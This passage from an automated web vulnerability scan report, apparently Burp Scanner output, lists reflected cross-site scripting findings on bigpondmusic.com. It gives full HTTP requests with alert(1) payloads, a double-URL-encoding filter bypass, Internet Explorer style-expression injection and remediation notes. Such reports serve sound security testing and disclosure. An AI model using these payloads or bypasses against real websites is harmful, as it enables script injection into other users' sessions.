GET /mixtapes14be3'%3be9b05043c37/my HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87718
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81532%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e581cc6a8032 was submitted in the REST URL parameter 1. This input was echoed as 81532"><script>alert(1)</script>581cc6a8032 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes81532%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e581cc6a8032/my HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87967
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a6c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e815e4c85f12 was submitted in the REST URL parameter 2. This input was echoed as 68a6c"><script>alert(1)</script>815e4c85f12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes/my68a6c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e815e4c85f12 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88544
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a68c8'%3bd1c6965a88e was submitted in the REST URL parameter 2. This input was echoed as a68c8';d1c6965a88e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/mya68c8'%3bd1c6965a88e HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87812
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.325. http://bigpondmusic.com/mixtapes/my [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/mixtapes/my
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3950b"style%3d"x%3aexpression(alert(1))"924e74bd953 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3950b"style="x:expression(alert(1))"924e74bd953 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /mixtapes/my?3950b"style%3d"x%3aexpression(alert(1))"924e74bd953=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 66639
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Login - BigPond Music MP3 Do ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/my?3950b"style="x:expression(alert(1))"924e74bd953=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3f14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4088cadae99 was submitted in the REST URL parameter 1. This input was echoed as a3f14"><script>alert(1)</script>4088cadae99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mya3f14%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4088cadae99/password HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87965
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a5e7'%3b84668ae8af1 was submitted in the REST URL parameter 1. This input was echoed as 2a5e7';84668ae8af1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /my2a5e7'%3b84668ae8af1/password HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:26:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88406
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28047%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18810252797 was submitted in the REST URL parameter 2. This input was echoed as 28047"><script>alert(1)</script>18810252797 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /my/password28047%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18810252797 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88326
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1bd0'%3b5a7abd16f6b was submitted in the REST URL parameter 2. This input was echoed as f1bd0';5a7abd16f6b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /my/passwordf1bd0'%3b5a7abd16f6b HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87997
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.330. http://bigpondmusic.com/my/password [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/my/password
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f4e7"style%3d"x%3aexpression(alert(1))"ca05f3d7abb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f4e7"style="x:expression(alert(1))"ca05f3d7abb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /my/password?1f4e7"style%3d"x%3aexpression(alert(1))"ca05f3d7abb=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:26:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 80255
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c095b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e0bb0bd59 was submitted in the REST URL parameter 1. This input was echoed as c095b"><script>alert(1)</script>57e0bb0bd59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /newsc095b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57e0bb0bd59/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88440
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85c07'%3b03e5bb4ca27 was submitted in the REST URL parameter 1. This input was echoed as 85c07';03e5bb4ca27 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news85c07'%3b03e5bb4ca27/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87777
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.333. http://bigpondmusic.com/news/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34ad0"style%3d"x%3aexpression(alert(1))"69678540c8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 34ad0"style="x:expression(alert(1))"69678540c8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/?34ad0"style%3d"x%3aexpression(alert(1))"69678540c8b=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 102008
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Music News - Latest Music Ne ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/?34ad0"style="x:expression(alert(1))"69678540c8b=1" /> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a31"style%3d"x%3aexpression(alert(1))"a7ebc0ba046 was submitted in the ref parameter. This input was echoed as 75a31"style="x:expression(alert(1))"a7ebc0ba046 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/?ref=Net-Head-Music-News75a31"style%3d"x%3aexpression(alert(1))"a7ebc0ba046 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 101808
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Music News - Latest Music Ne ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/?ref=Net-Head-Music-News75a31"style="x:expression(alert(1))"a7ebc0ba046" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e92a3'%3b18947b8525a was submitted in the REST URL parameter 1. This input was echoed as e92a3';18947b8525a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newse92a3'%3b18947b8525a/article/5074/chris-brown-s-behaviour-praised-by-judge HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
